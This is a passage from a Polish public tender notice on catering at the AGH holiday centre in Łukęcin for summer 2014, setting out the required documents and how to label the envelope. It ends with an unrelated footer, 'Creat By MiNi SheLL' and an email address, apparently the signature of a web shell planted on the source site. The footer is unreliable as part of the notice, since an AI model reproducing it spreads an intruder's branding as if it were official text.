kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów winny być poświadczone za zgodność z oryginałem przez wykonawcę lub te podmioty. 6/Pełnomocnictwo załączone do wniosku o dopuszczenie do udziału w postepowaniu powinno być w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza 7/Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 8/ Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt III.4.3.1), zastępuje się je  dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożonym przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 9/Wniosek o dopuszczenie do udziału w dialogu oraz wszystkie wymagane dokumenty stanowiace załączniki do wniosku Wykonawca winien umieścić w kopercie oznaczonej nazwą i adresem Zamawiającego oraz opisanej w następujący sposób: Wniosek o dopuszczenie do udziału w postepowaniu prowadzonym w trybie dialogu konkurencyjnego na: prowadzenie żywienia w Ośrodku Wczasowo-Kolonijnym AGH w Łukęcinie w sezonie letnim 2014 - KC-zp.272-78/14 NIE OTWIERAĆ przed 2014.03.26, godz. 11:00, znak sprawy: KC-zp.272-78/14..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com